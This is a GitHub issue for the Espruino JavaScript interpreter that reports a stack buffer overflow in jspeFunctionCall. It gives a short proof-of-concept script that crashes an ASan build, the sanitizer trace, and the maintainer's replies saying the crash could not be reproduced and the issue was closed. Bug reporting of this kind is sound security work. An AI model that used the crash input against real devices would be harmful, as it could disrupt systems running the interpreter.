espruino/Espruino #2144: dynamic-stack-buffer-overflow jsparse.c:558:27 in jspeFunctionCall

Q1IQ, 2022-02-09:
### Environment

```
OS      : Linux ubuntu 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Commit  : e069be2ecc5060ef47391716e4de94999595b260
Version : 2v12
Build   : CFLAGS += -fsanitize=address -fno-omit-frame-pointer 
```

### Proof of concept

```
function main() {
    var a0 = Object(Object);
    a0.bind(Infinity,58340)();
}
main();

```

### Stack dump

```
=================================================================
==544111==ERROR: AddressSanitizer: dynamic-stack-buffer-overflow on address 0x7ffcd2364a00 at pc 0x0000005181d1 bp 0x7ffcd23649d0 sp 0x7ffcd23649c8
WRITE of size 8 at 0x7ffcd2364a00 thread T0
    #0 0x5181d0 in jspeFunctionCall /home/q1iq/Documents/origin/Espruino_e069be2/src/jsparse.c:558:27
    #1 0x51c7dd in jspeFactorFunctionCall /home/q1iq/Documents/origin/Espruino_e069be2/src/jsparse.c:1202:11
    #2 0x522f9a in jspePostfixExpression /home/q1iq/Documents/origin/Espruino_e069be2/src/jsparse.c:1821:9
    #3 0x5234e9 in jspeUnaryExpression /home/q1iq/Documents/origin/Espruino_e069be2/src/jsparse.c:1847:12
    #4 0x5242b8 in jspeBinaryExpression /home/q1iq/Documents/origin/Espruino_e069be2/src/jsparse.c:1990:33
    #5 0x5247c8 in jspeConditionalExpression /home/q1iq/Documents/origin/Espruino_e069be2/src/jsparse.c:2026:38
    #6 0x525358 in jspeAssignmentExpression /home/q1iq/Documents/origin/Espruino_e069be2/src/jsparse.c:2085:37
    #7 0x525402 in jspeExpression /home/q1iq/Documents/origin/Espruino_e069be2/src/jsparse.c:2091:16
    #8 0x52d15a in jspeStatement /home/q1iq/Documents/origin/Espruino_e069be2/src/jsparse.c:2791:12
    #9 0x525a90 in jspeBlockNoBrackets /home/q1iq/Documents/origin/Espruino_e069be2/src/jsparse.c:2119:18
    #10 0x519f9d in jspeFunctionCall /home/q1iq/Documents/origin/Espruino_e069be2/src/jsparse.c:809:15
    #11 0x51c7dd in jspeFactorFunctionCall /home/q1iq/Documents/origin/Espruino_e069be2/src/jsparse.c:1202:11
    #12 0x522f9a in jspePostfixExpression /home/q1iq/Documents/origin/Espruino_e069be2/src/jsparse.c:1821:9
    #13 0x5234e9 in jspeUnaryExpression /home/q1iq/Documents/origin/Espruino_e069be2/src/jsparse.c:1847:12
    #14 0x5242b8 in jspeBinaryExpression /home/q1iq/Documents/origin/Espruino_e069be2/src/jsparse.c:1990:33
    #15 0x5247c8 in jspeConditionalExpression /home/q1iq/Documents/origin/Espruino_e069be2/src/jsparse.c:2026:38
    #16 0x525358 in jspeAssignmentExpression /home/q1iq/Documents/origin/Espruino_e069be2/src/jsparse.c:2085:37
    #17 0x525402 in jspeExpression /home/q1iq/Documents/origin/Espruino_e069be2/src/jsparse.c:2091:16
    #18 0x52d15a in jspeStatement /home/q1iq/Documents/origin/Espruino_e069be2/src/jsparse.c:2791:12
    #19 0x525f97 in jspeBlockOrStatement /home/q1iq/Documents/origin/Espruino_e069be2/src/jsparse.c:2159:16
    #20 0x526233 in jspParse /home/q1iq/Documents/origin/Espruino_e069be2/src/jsparse.c:2171:9
    #21 0x52f099 in jspEvaluateVar /home/q1iq/Documents/origin/Espruino_e069be2/src/jsparse.c:3031:14
    #22 0x52f318 in jspEvaluate /home/q1iq/Documents/origin/Espruino_e069be2/src/jsparse.c:3061:9
    #23 0x63afb8 in main /home/q1iq/Documents/origin/Espruino_e069be2/targets/linux/main.c:461:15
    #24 0x7fcacf84b0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #25 0x41c59d in _start (/home/q1iq/Documents/origin/Espruino_e069be2/espruino+0x41c59d)

Address 0x7ffcd2364a00 is located in stack of thread T0
SUMMARY: AddressSanitizer: dynamic-stack-buffer-overflow /home/q1iq/Documents/origin/Espruino_e069be2/src/jsparse.c:558:27 in jspeFunctionCall
Shadow bytes around the buggy address:
  0x10001a4648f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10001a464900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10001a464910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10001a464920: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10001a464930: 00 00 00 00 00 00 00 00 00 00 00 00 ca ca ca ca
=>0x10001a464940:[cb]cb cb cb f1 f1 f1 f1 00 f2 f2 f2 f8 f2 f2 f2
  0x10001a464950: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
  0x10001a464960: f8 f8 f8 f8 f8 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3
  0x10001a464970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10001a464980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10001a464990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==544111==ABORTING

```

### Credit

Q1IQ(@Q1IQ)

gfwilliams, 2022-02-09:
Hi - I'm not seeing this one - any hints?

No errors when I run it, and breaking on line 588 shows `alloca` is being called for just 16x JsVars - so by no means a big allocation

Q1IQ, 2022-02-09:
Sorry I'm not very familiar with espruino's codebase, but I can trigger this crash stably on my system

gfwilliams, 2022-06-08:
Closing this as I'm unable to reproduce on 2v13

closed 2022-06-08 by gfwilliams